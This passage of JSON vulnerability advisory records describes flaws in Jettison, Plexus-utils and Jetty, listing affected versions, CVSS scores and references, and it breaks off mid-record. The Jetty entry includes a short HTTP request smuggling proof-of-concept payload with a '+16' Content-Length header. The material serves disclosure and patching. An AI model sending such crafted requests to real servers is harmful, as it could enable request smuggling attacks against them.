"github_reviewed_at": "2022-09-20T21:22:04Z", "nvd_published_at": "2022-09-16T10:15:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-7rf3-mqpx-h7xg", "published": "2022-12-13T15:30:26Z", "modified": "2023-11-08T04:10:53.332746Z", "aliases": [ "CVE-2022-45685" ], "summary": "Jettison Out-of-bounds Write vulnerability", "details": "A stack overflow in Jettison before v1.5.2 allows attackers to cause a Denial of Service (DoS) via crafted JSON data.", "affected": [ { "package": { "name": "org.codehaus.jettison:jettison", "ecosystem": "Maven", "purl": "pkg:maven/org.codehaus.jettison/jettison" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.5.2" } ] } ], "versions": [ "1.0", "1.0-RC1", "1.0-RC2", "1.0-alpha-1", "1.0-beta-1", "1.0.1", "1.1", "1.2", "1.3", "1.3.1", "1.3.2", "1.3.3", "1.3.4", "1.3.5", "1.3.6", "1.3.7", "1.3.8", "1.4.0", "1.4.1", "1.5.0", "1.5.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/12/GHSA-7rf3-mqpx-h7xg/GHSA-7rf3-mqpx-h7xg.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-45685" }, { "type": "WEB", "url": "https://github.com/jettison-json/jettison/issues/54" }, { "type": "PACKAGE", "url": "https://github.com/jettison-json/jettison" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2022/12/msg00045.html" }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5312" } ], "database_specific": { "cwe_ids": [ "CWE-787" ], "github_reviewed": true, "github_reviewed_at": "2023-01-04T14:27:01Z", "nvd_published_at": "2022-12-13T15:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-grr4-wv38-f68w", "published": "2022-12-13T15:30:27Z", "modified": "2023-11-08T04:10:53.577855Z", "aliases": [ "CVE-2022-45693" ], "summary": "Jettison Out-of-bounds Write vulnerability", "details": "Jettison before v1.5.2 was discovered to contain a stack overflow via the map parameter. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted string.", "affected": [ { "package": { "name": "org.codehaus.jettison:jettison", "ecosystem": "Maven", "purl": "pkg:maven/org.codehaus.jettison/jettison" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.5.2" } ] } ], "versions": [ "1.0", "1.0-RC1", "1.0-RC2", "1.0-alpha-1", "1.0-beta-1", "1.0.1", "1.1", "1.2", "1.3", "1.3.1", "1.3.2", "1.3.3", "1.3.4", "1.3.5", "1.3.6", "1.3.7", "1.3.8", "1.4.0", "1.4.1", "1.5.0", "1.5.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/12/GHSA-grr4-wv38-f68w/GHSA-grr4-wv38-f68w.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-45693" }, { "type": "WEB", "url": "https://github.com/jettison-json/jettison/issues/52" }, { "type": "PACKAGE", "url": "https://github.com/jettison-json/jettison" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2022/12/msg00045.html" }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5312" } ], "database_specific": { "cwe_ids": [ "CWE-787" ], "github_reviewed": true, "github_reviewed_at": "2023-01-04T14:25:45Z", "nvd_published_at": "2022-12-13T15:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-q6g2-g7f3-rr83", "published": "2023-03-22T06:30:21Z", "modified": "2024-02-20T05:34:09.671471Z", "aliases": [ "CVE-2023-1436" ], "summary": "Jettison vulnerable to infinite recursion", "details": "An infinite recursion is triggered in Jettison when constructing a JSONArray from a Collection that contains a self-reference in one of its elements. This leads to a StackOverflowError exception being thrown.", "affected": [ { "package": { "name": "org.codehaus.jettison:jettison", "ecosystem": "Maven", "purl": "pkg:maven/org.codehaus.jettison/jettison" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.5.4" } ] } ], "versions": [ "1.0", "1.0-RC1", "1.0-RC2", "1.0-alpha-1", "1.0-beta-1", "1.0.1", "1.1", "1.2", "1.3", "1.3.1", "1.3.2", "1.3.3", "1.3.4", "1.3.5", "1.3.6", "1.3.7", "1.3.8", "1.4.0", "1.4.1", "1.5.0", "1.5.1", "1.5.2", "1.5.3" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/03/GHSA-q6g2-g7f3-rr83/GHSA-q6g2-g7f3-rr83.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-1436" }, { "type": "WEB", "url": "https://github.com/jettison-json/jettison/issues/60" }, { "type": "WEB", "url": "https://github.com/jettison-json/jettison/pull/62" }, { "type": "PACKAGE", "url": "https://github.com/jettison-json/jettison" }, { "type": "WEB", "url": "https://github.com/jettison-json/jettison/releases/tag/jettison-1.5.4" }, { "type": "WEB", "url": "https://research.jfrog.com/vulnerabilities/jettison-json-array-dos-xray-427911" } ], "database_specific": { "cwe_ids": [ "CWE-674" ], "github_reviewed": true, "github_reviewed_at": "2023-03-22T21:23:09Z", "nvd_published_at": "2023-03-22T06:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-x27m-9w8j-5vcw", "published": "2022-09-17T00:00:41Z", "modified": "2024-02-16T08:08:08.595900Z", "aliases": [ "CVE-2022-40150" ], "summary": "Jettison memory exhaustion", "details": "Those using Jettison to parse untrusted XML or JSON data may be vulnerable to Denial of Service attacks (DOS). If the parser is running on user supplied input, an attacker may supply content that causes the parser to crash by Out of memory. This effect may support a denial of service attack.", "affected": [ { "package": { "name": "org.codehaus.jettison:jettison", "ecosystem": "Maven", "purl": "pkg:maven/org.codehaus.jettison/jettison" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.5.2" } ] } ], "versions": [ "1.0", "1.0-RC1", "1.0-RC2", "1.0-alpha-1", "1.0-beta-1", "1.0.1", "1.1", "1.2", "1.3", "1.3.1", "1.3.2", "1.3.3", "1.3.4", "1.3.5", "1.3.6", "1.3.7", "1.3.8", "1.4.0", "1.4.1", "1.5.0", "1.5.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/09/GHSA-x27m-9w8j-5vcw/GHSA-x27m-9w8j-5vcw.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-40150" }, { "type": "WEB", "url": "https://github.com/jettison-json/jettison/issues/45" }, { "type": "WEB", "url": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=46549" }, { "type": "PACKAGE", "url": "https://github.com/jettison-json/jettison" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2022/12/msg00045.html" }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5312" } ], "database_specific": { "cwe_ids": [ "CWE-400", "CWE-674" ], "github_reviewed": true, "github_reviewed_at": "2022-09-20T21:20:42Z", "nvd_published_at": "2022-09-16T10:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-8vhq-qq4p-grq3", "published": "2022-05-13T01:11:53Z", "modified": "2025-01-14T06:59:30.610519Z", "aliases": [ "CVE-2017-1000487" ], "summary": "OS Command Injection in Plexus-utils", "details": "Plexus-utils before 3.0.16 is vulnerable to command injection because it does not correctly process the contents of double quoted strings.", "affected": [ { "package": { "name": "org.codehaus.plexus:plexus-utils", "ecosystem": "Maven", "purl": "pkg:maven/org.codehaus.plexus/plexus-utils" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "3.0.16" } ] } ], "versions": [ "1.0.4", "1.0.5", "1.1", "1.2", "1.3", "1.4", "1.4-alpha-1", "1.4.1", "1.4.2", "1.4.3", "1.4.4", "1.4.5", "1.4.6", "1.4.7", "1.4.8", "1.4.9", "1.5", "1.5.1", "1.5.10", "1.5.11", "1.5.12", "1.5.13", "1.5.14", "1.5.15", "1.5.2", "1.5.3", "1.5.4", "1.5.5", "1.5.6", "1.5.7", "1.5.8", "1.5.9", "2.0.0", "2.0.1", "2.0.2", "2.0.3", "2.0.4", "2.0.5", "2.0.6", "2.0.7", "2.1", "3.0", "3.0.1", "3.0.10", "3.0.11", "3.0.12", "3.0.13", "3.0.14", "3.0.15", "3.0.2", "3.0.3", "3.0.4", "3.0.5", "3.0.6", "3.0.7", "3.0.8", "3.0.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-8vhq-qq4p-grq3/GHSA-8vhq-qq4p-grq3.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-1000487" }, { "type": "WEB", "url": "https://github.com/codehaus-plexus/plexus-utils/commit/b38a1b3a4352303e4312b2bb601a0d7ec6e28f41" }, { "type": "WEB", "url": "https://www.debian.org/security/2018/dsa-4149" }, { "type": "WEB", "url": "https://www.debian.org/security/2018/dsa-4146" }, { "type": "WEB", "url": "https://snyk.io/vuln/SNYK-JAVA-ORGCODEHAUSPLEXUS-31522" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2018/01/msg00011.html" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2018/01/msg00010.html" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd0e44e8ef71eeaaa3cf3d1b8b41eb25894372e2995ec908ce7624d26@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd0e44e8ef71eeaaa3cf3d1b8b41eb25894372e2995ec908ce7624d26%40%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r9584c4304c888f651d214341a939bd264ed30c9e3d0d30fe85097ecf@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r9584c4304c888f651d214341a939bd264ed30c9e3d0d30fe85097ecf%40%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r2e94f72f53df432302d359fd66cfa9e9efb8d42633d54579a4377e62@%3Cdev.avro.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r2e94f72f53df432302d359fd66cfa9e9efb8d42633d54579a4377e62%40%3Cdev.avro.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/9317fd092b257a0815434b116a8af8daea6e920b6673f4fd5583d5fe@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/9317fd092b257a0815434b116a8af8daea6e920b6673f4fd5583d5fe%40%3Ccommits.druid.apache.org%3E" }, { "type": "PACKAGE", "url": "https://github.com/codehaus-plexus/plexus-utils" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:1322" } ], "database_specific": { "cwe_ids": [ "CWE-78" ], "github_reviewed": true, "github_reviewed_at": "2022-07-01T21:47:32Z", "nvd_published_at": "2018-01-03T20:29:00Z", "severity": "CRITICAL" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-g6ph-x5wf-g337", "published": "2023-09-25T21:30:26Z", "modified": "2024-05-03T20:31:38.024044Z", "aliases": [ "CVE-2022-4244" ], "summary": "plexus-codehaus vulnerable to directory traversal", "details": "A flaw was found in plexus-codehaus. A directory traversal attack (also known as path traversal) aims to access files and directories stored outside the intended folder. By manipulating files with dot-dot-slash (`../`) sequences and their variations or by using absolute file paths, it may be possible to access arbitrary files and directories stored on the file system, including application source code, configuration, and other critical system files. ", "affected": [ { "package": { "name": "org.codehaus.plexus:plexus-utils", "ecosystem": "Maven", "purl": "pkg:maven/org.codehaus.plexus/plexus-utils" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "3.0.24" } ] } ], "versions": [ "1.0.4", "1.0.5", "1.1", "1.2", "1.3", "1.4", "1.4-alpha-1", "1.4.1", "1.4.2", "1.4.3", "1.4.4", "1.4.5", "1.4.6", "1.4.7", "1.4.8", "1.4.9", "1.5", "1.5.1", "1.5.10", "1.5.11", "1.5.12", "1.5.13", "1.5.14", "1.5.15", "1.5.2", "1.5.3", "1.5.4", "1.5.5", "1.5.6", "1.5.7", "1.5.8", "1.5.9", "2.0.0", "2.0.1", "2.0.2", "2.0.3", "2.0.4", "2.0.5", "2.0.6", "2.0.7", "2.1", "3.0", "3.0.1", "3.0.10", "3.0.11", "3.0.12", "3.0.13", "3.0.14", "3.0.15", "3.0.16", "3.0.17", "3.0.18", "3.0.19", "3.0.2", "3.0.20", "3.0.21", "3.0.22", "3.0.23", "3.0.3", "3.0.4", "3.0.5", "3.0.6", "3.0.7", "3.0.8", "3.0.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/09/GHSA-g6ph-x5wf-g337/GHSA-g6ph-x5wf-g337.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-4244" }, { "type": "WEB", "url": "https://github.com/codehaus-plexus/plexus-utils/issues/4" }, { "type": "WEB", "url": "https://github.com/codehaus-plexus/plexus-utils/commit/33a2853df8185b4519b1b8bfae284f03392618ef" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2023:2135" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2023:3906" }, { "type": "WEB", "url": "https://access.redhat.com/security/cve/CVE-2022-4244" }, { "type": "WEB", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2149841" }, { "type": "WEB", "url": "https://security.snyk.io/vuln/SNYK-JAVA-ORGCODEHAUSPLEXUS-31521" } ], "database_specific": { "cwe_ids": [ "CWE-22" ], "github_reviewed": true, "github_reviewed_at": "2023-09-26T17:59:40Z", "nvd_published_at": "2023-09-25T20:15:10Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-jcwr-x25h-x5fh", "published": "2023-09-25T21:30:26Z", "modified": "2024-05-03T20:32:52.547057Z", "aliases": [ "CVE-2022-4245" ], "summary": "codehaus-plexus vulnerable to XML injection", "details": "A flaw was found in codehaus-plexus. The `org.codehaus.plexus.util.xml.XmlWriterUtil#writeComment` fails to sanitize comments for a `--\u003e` sequence. This issue means that text contained in the command string could be interpreted as XML and allow for XML injection. ", "affected": [ { "package": { "name": "org.codehaus.plexus:plexus-utils", "ecosystem": "Maven", "purl": "pkg:maven/org.codehaus.plexus/plexus-utils" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "3.0.24" } ] } ], "versions": [ "1.0.4", "1.0.5", "1.1", "1.2", "1.3", "1.4", "1.4-alpha-1", "1.4.1", "1.4.2", "1.4.3", "1.4.4", "1.4.5", "1.4.6", "1.4.7", "1.4.8", "1.4.9", "1.5", "1.5.1", "1.5.10", "1.5.11", "1.5.12", "1.5.13", "1.5.14", "1.5.15", "1.5.2", "1.5.3", "1.5.4", "1.5.5", "1.5.6", "1.5.7", "1.5.8", "1.5.9", "2.0.0", "2.0.1", "2.0.2", "2.0.3", "2.0.4", "2.0.5", "2.0.6", "2.0.7", "2.1", "3.0", "3.0.1", "3.0.10", "3.0.11", "3.0.12", "3.0.13", "3.0.14", "3.0.15", "3.0.16", "3.0.17", "3.0.18", "3.0.19", "3.0.2", "3.0.20", "3.0.21", "3.0.22", "3.0.23", "3.0.3", "3.0.4", "3.0.5", "3.0.6", "3.0.7", "3.0.8", "3.0.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/09/GHSA-jcwr-x25h-x5fh/GHSA-jcwr-x25h-x5fh.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-4245" }, { "type": "WEB", "url": "https://github.com/codehaus-plexus/plexus-utils/issues/3" }, { "type": "WEB", "url": "https://github.com/codehaus-plexus/plexus-utils/commit/f933e5e78dc2637e485447ed821fe14904f110de" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2023:2135" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2023:3906" }, { "type": "WEB", "url": "https://access.redhat.com/security/cve/CVE-2022-4245" }, { "type": "WEB", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2149843" }, { "type": "PACKAGE", "url": "https://github.com/codehaus-plexus/plexus-utils" }, { "type": "WEB", "url": "https://security.snyk.io/vuln/SNYK-JAVA-ORGCODEHAUSPLEXUS-461102" } ], "database_specific": { "cwe_ids": [ "CWE-611", "CWE-91" ], "github_reviewed": true, "github_reviewed_at": "2023-09-26T19:38:53Z", "nvd_published_at": "2023-09-25T20:15:10Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-cj7v-27pg-wf7q", "published": "2022-07-07T20:55:34Z", "modified": "2024-02-16T08:00:47.277184Z", "aliases": [ "CVE-2022-2047" ], "related": [ "CVE-2022-2047" ], "summary": "Jetty invalid URI parsing may produce invalid HttpURI.authority", "details": "### Description\nURI use within Jetty's `HttpURI` class can parse invalid URIs such as `http://localhost;/path` as having an authority with a host of `localhost;`.\n\nA URIs of the type `http://localhost;/path` should be interpreted to be either invalid or as `localhost;` to be the userinfo and no host.\nHowever, `HttpURI.host` returns `localhost;` which is definitely wrong.\n\n### Impact\nThis can lead to errors with Jetty's `HttpClient`, and Jetty's `ProxyServlet` / `AsyncProxyServlet` / `AsyncMiddleManServlet` wrongly interpreting an authority with no host as one with a host.\n\n### Patches\nPatched in PR [#8146](https://github.com/eclipse/jetty.project/pull/8146) for Jetty version 9.4.47.\nPatched in PR [#8014](https://github.com/eclipse/jetty.project/pull/8015) for Jetty versions 10.0.10, and 11.0.10\n\n### Workarounds\nNone.\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Email us at security@webtide.com.", "affected": [ { "package": { "name": "org.eclipse.jetty:jetty-http", "ecosystem": "Maven", "purl": "pkg:maven/org.eclipse.jetty/jetty-http" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "9.4.47" } ] } ], "versions": [ "7.0.0.M0", "7.0.0.M1", "7.0.0.M2", "7.0.0.M3", "7.0.0.M4", "7.0.0.RC0", "7.0.0.RC1", "7.0.0.RC2", "7.0.0.RC3", "7.0.0.RC4", "7.0.0.RC5", "7.0.0.RC6", "7.0.0.v20091005", "7.0.1.v20091125", "7.0.2.RC0", "7.0.2.v20100331", "7.1.0.RC0", "7.1.0.RC1", "7.1.0.v20100505", "7.1.1.v20100517", "7.1.2.v20100523", "7.1.3.v20100526", "7.1.4.v20100610", "7.1.5.v20100705", "7.1.6.v20100715", "7.2.0.RC0", "7.2.0.v20101020", "7.2.1.v20101111", "7.2.2.v20101205", "7.3.0.v20110203", "7.3.1.v20110307", "7.4.0.RC0", "7.4.0.v20110414", "7.4.1.v20110513", "7.4.2.v20110526", "7.4.3.v20110701", "7.4.4.v20110707", "7.4.5.v20110725", "7.5.0.RC0", "7.5.0.RC1", "7.5.0.RC2", "7.5.0.v20110901", "7.5.1.v20110908", "7.5.2.v20111006", "7.5.3.v20111011", "7.5.4.v20111024", "7.6.0.RC0", "7.6.0.RC1", "7.6.0.RC2", "7.6.0.RC3", "7.6.0.RC4", "7.6.0.RC5", "7.6.0.v20120127", "7.6.1.v20120215", "7.6.10.v20130312", "7.6.11.v20130520", "7.6.12.v20130726", "7.6.13.v20130916", "7.6.14.v20131031", "7.6.15.v20140411", "7.6.16.v20140903", "7.6.17.v20150415", "7.6.18.v20150929", "7.6.19.v20160209", "7.6.2.v20120308", "7.6.20.v20160902", "7.6.21.v20160908", "7.6.3.v20120416", "7.6.4.v20120524", "7.6.5.v20120716", "7.6.6.v20120903", "7.6.7.v20120910", "7.6.8.v20121106", "7.6.9.v20130131", "8.0.0.M0", "8.0.0.M1", "8.0.0.M2", "8.0.0.M3", "8.0.0.RC0", "8.0.0.v20110901", "8.0.1.v20110908", "8.0.2.v20111006", "8.0.3.v20111011", "8.0.4.v20111024", "8.1.0.RC0", "8.1.0.RC1", "8.1.0.RC2", "8.1.0.RC4", "8.1.0.RC5", "8.1.0.v20120127", "8.1.1.v20120215", "8.1.10.v20130312", "8.1.11.v20130520", "8.1.12.v20130726", "8.1.13.v20130916", "8.1.14.v20131031", "8.1.15.v20140411", "8.1.16.v20140903", "8.1.17.v20150415", "8.1.18.v20150929", "8.1.19.v20160209", "8.1.2.v20120308", "8.1.20.v20160902", "8.1.21.v20160908", "8.1.22.v20160922", "8.1.3.v20120416", "8.1.4.v20120524", "8.1.5.v20120716", "8.1.6.v20120903", "8.1.7.v20120910", "8.1.8.v20121106", "8.1.9.v20130131", "8.2.0.v20160908", "9.0.0.M0", "9.0.0.M1", "9.0.0.M2", "9.0.0.M3", "9.0.0.M4", "9.0.0.M5", "9.0.0.RC0", "9.0.0.RC1", "9.0.0.RC2", "9.0.0.v20130308", "9.0.1.v20130408", "9.0.2.v20130417", "9.0.3.v20130506", "9.0.4.v20130625", "9.0.5.v20130815", "9.0.6.v20130930", "9.0.7.v20131107", "9.1.0.M0", "9.1.0.RC0", "9.1.0.RC1", "9.1.0.RC2", "9.1.0.v20131115", "9.1.1.v20140108", "9.1.2.v20140210", "9.1.3.v20140225", "9.1.4.v20140401", "9.1.5.v20140505", "9.1.6.v20160112", "9.2.0.M0", "9.2.0.M1", "9.2.0.RC0", "9.2.0.v20140526", "9.2.1.v20140609", "9.2.10.v20150310", "9.2.11.M0", "9.2.11.v20150529", "9.2.12.M0", "9.2.12.v20150709", "9.2.13.v20150730", "9.2.14.v20151106", "9.2.15.v20160210", "9.2.16.v20160414", "9.2.17.v20160517", "9.2.18.v20160721", "9.2.19.v20160908", "9.2.2.v20140723", "9.2.20.v20161216", "9.2.21.v20170120", "9.2.22.v20170606", "9.2.23.v20171218", "9.2.24.v20180105", "9.2.25.v20180606", "9.2.26.v20180806", "9.2.27.v20190403", "9.2.28.v20190418", "9.2.29.v20191105", "9.2.3.v20140905", "9.2.30.v20200428", "9.2.4.v20141103", "9.2.5.v20141112", "9.2.6.v20141205", "9.2.7.v20150116", "9.2.8.v20150217", "9.2.9.v20150224", "9.3.0.M0", "9.3.0.M1", "9.3.0.M2", "9.3.0.RC0", "9.3.0.RC1", "9.3.0.v20150612", "9.3.1.v20150714", "9.3.10.M0", "9.3.10.v20160621", "9.3.11.M0", "9.3.11.v20160721", "9.3.12.v20160915", "9.3.13.M0", "9.3.13.v20161014", "9.3.14.v20161028", "9.3.15.v20161220", "9.3.16.v20170120", "9.3.17.RC0", "9.3.17.v20170317", "9.3.18.v20170406", "9.3.19.v20170502", "9.3.2.v20150730", "9.3.20.v20170531", "9.3.21.M0", "9.3.21.RC0", "9.3.21.v20170918", "9.3.22.v20171030", "9.3.23.v20180228", "9.3.24.v20180605", "9.3.25.v20180904", "9.3.26.v20190403", "9.3.27.v20190418", "9.3.28.v20191105", "9.3.29.v20201019", "9.3.3.v20150827", "9.3.30.v20211001", "9.3.4.RC0", "9.3.4.RC1", "9.3.4.v20151007", "9.3.5.v20151012", "9.3.6.v20151106", "9.3.7.RC0", "9.3.7.RC1", "9.3.7.v20160115", "9.3.8.RC0", "9.3.8.v20160314", "9.3.9.M0", "9.3.9.M1", "9.3.9.v20160517", "9.4.0.M0", "9.4.0.M1", "9.4.0.RC0", "9.4.0.RC1", "9.4.0.RC2", "9.4.0.RC3", "9.4.0.v20161208", "9.4.0.v20180619", "9.4.1.v20170120", "9.4.1.v20180619", "9.4.10.RC0", "9.4.10.RC1", "9.4.10.v20180503", "9.4.11.v20180605", "9.4.12.RC0", "9.4.12.RC1", "9.4.12.RC2", "9.4.12.v20180830", "9.4.13.v20181111", "9.4.14.v20181114", "9.4.15.v20190215", "9.4.16.v20190411", "9.4.17.v20190418", "9.4.18.v20190429", "9.4.19.v20190610", "9.4.2.v20170220", "9.4.2.v20180619", "9.4.20.v20190813", "9.4.21.v20190926", "9.4.22.v20191022", "9.4.23.v20191118", "9.4.24.v20191120", "9.4.25.v20191220", "9.4.26.v20200117", "9.4.27.v20200227", "9.4.28.v20200408", "9.4.29.v20200521", "9.4.3.v20170317", "9.4.3.v20180619", "9.4.30.v20200611", "9.4.31.v20200723", "9.4.32.v20200930", "9.4.33.v20201020", "9.4.34.v20201102", "9.4.35.v20201120", "9.4.36.v20210114", "9.4.37.v20210219", "9.4.38.v20210224", "9.4.39.v20210325", "9.4.4.v20170414", "9.4.4.v20180619", "9.4.40.v20210413", "9.4.41.v20210516", "9.4.42.v20210604", "9.4.43.v20210629", "9.4.44.v20210927", "9.4.45.v20220203", "9.4.46.v20220331", "9.4.5.v20170502", "9.4.5.v20180619", "9.4.6.v20170531", "9.4.6.v20180619", "9.4.7.RC0", "9.4.7.v20170914", "9.4.7.v20180619", "9.4.8.v20171121", "9.4.8.v20180619", "9.4.9.v20180320" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/07/GHSA-cj7v-27pg-wf7q/GHSA-cj7v-27pg-wf7q.json" } }, { "package": { "name": "org.eclipse.jetty:jetty-http", "ecosystem": "Maven", "purl": "pkg:maven/org.eclipse.jetty/jetty-http" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "10.0.0" }, { "fixed": "10.0.10" } ] } ], "versions": [ "10.0.0", "10.0.1", "10.0.2", "10.0.3", "10.0.4", "10.0.5", "10.0.6", "10.0.7", "10.0.8", "10.0.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/07/GHSA-cj7v-27pg-wf7q/GHSA-cj7v-27pg-wf7q.json" } }, { "package": { "name": "org.eclipse.jetty:jetty-http", "ecosystem": "Maven", "purl": "pkg:maven/org.eclipse.jetty/jetty-http" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "11.0.0" }, { "fixed": "11.0.10" } ] } ], "versions": [ "11.0.0", "11.0.1", "11.0.2", "11.0.3", "11.0.4", "11.0.5", "11.0.6", "11.0.7", "11.0.8", "11.0.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/07/GHSA-cj7v-27pg-wf7q/GHSA-cj7v-27pg-wf7q.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/eclipse/jetty.project/security/advisories/GHSA-cj7v-27pg-wf7q" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-2047" }, { "type": "PACKAGE", "url": "https://github.com/eclipse/jetty.project" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2022/08/msg00011.html" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20220901-0006" }, { "type": "WEB", "url": "https://www.debian.org/security/2022/dsa-5198" } ], "database_specific": { "cwe_ids": [ "CWE-20" ], "github_reviewed": true, "github_reviewed_at": "2022-07-07T20:55:34Z", "nvd_published_at": "2022-07-07T21:15:00Z", "severity": "LOW" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-hmr7-m48g-48f6", "published": "2023-09-14T16:17:27Z", "modified": "2024-02-16T07:59:58.440241Z", "aliases": [ "CVE-2023-40167" ], "related": [ "CGA-j3h8-74jw-2w8w", "CGA-vqpm-qwj8-mfq5" ], "summary": "Jetty accepts \"+\" prefixed value in Content-Length", "details": "### Impact\n\nJetty accepts the '+' character proceeding the content-length value in a HTTP/1 header field. This is more permissive than allowed by the RFC and other servers routinely reject such requests with 400 responses. There is no known exploit scenario, but it is conceivable that request smuggling could result if jetty is used in combination with a server that does not close the connection after sending such a 400 response.\n\n### Workarounds\n\nThere is no workaround as there is no known exploit scenario. \n\n### Original Report \n\n[RFC 9110 Secion 8.6](https://www.rfc-editor.org/rfc/rfc9110#section-8.6) defined the value of Content-Length header should be a string of 0-9 digits. However we found that Jetty accepts \"+\" prefixed Content-Length, which could lead to potential HTTP request smuggling.\n\nPayload:\n\n```\n POST / HTTP/1.1\n Host: a.com\n Content-Length: +16\n Connection: close\n ​\n 0123456789abcdef\n```\n\nWhen sending this payload to Jetty, it can successfully parse and identify the length.\n\nWhen sending this payload to NGINX, Apache HTTPd or other HTTP servers/parsers, they will return 400 bad request.\n\nThis behavior can lead to HTTP 